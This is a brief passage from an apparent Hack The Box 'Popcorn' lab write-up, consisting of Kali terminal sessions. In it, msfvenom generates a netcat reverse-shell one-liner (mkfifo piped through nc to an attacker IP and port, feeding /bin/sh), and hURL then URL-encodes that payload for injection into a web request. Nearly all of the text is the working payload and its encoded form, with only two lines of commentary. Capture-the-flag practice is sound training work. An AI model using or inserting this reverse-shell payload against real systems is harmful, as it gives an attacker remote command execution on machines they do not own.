msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/popcorn]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.5 LPORT=9999                           
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 92 bytes
mkfifo /tmp/yqths; nc 10.10.14.5 9999 0</tmp/yqths | /bin/sh >/tmp/yqths 2>&1; rm /tmp/yqths

msfvenom generated a reverse shell command

hURL


┌──(kali㉿kali)-[~/archive/htb/labs/popcorn]
└─$ hurl -U 'mkfifo /tmp/yqths; nc 10.10.14.5 9999 0</tmp/yqths | /bin/sh >/tmp/yqths 2>&1; rm /tmp/yqths'     
 
Original    :: mkfifo /tmp/yqths; nc 10.10.14.5 9999 0</tmp/yqths | /bin/sh >/tmp/yqths 2>&1; rm /tmp/yqths
URL ENcoded :: mkfifo%20%2Ftmp%2Fyqths%3B%20nc%2010.10.14.5%209999%200%3C%2Ftmp%2Fyqths%20%7C%20%2Fbin%2Fsh%20%3E%2Ftmp%2Fyqths%202%3E%261%3B%20rm%20%2Ftmp%2Fyqths

hURL encoded the payload in the URL format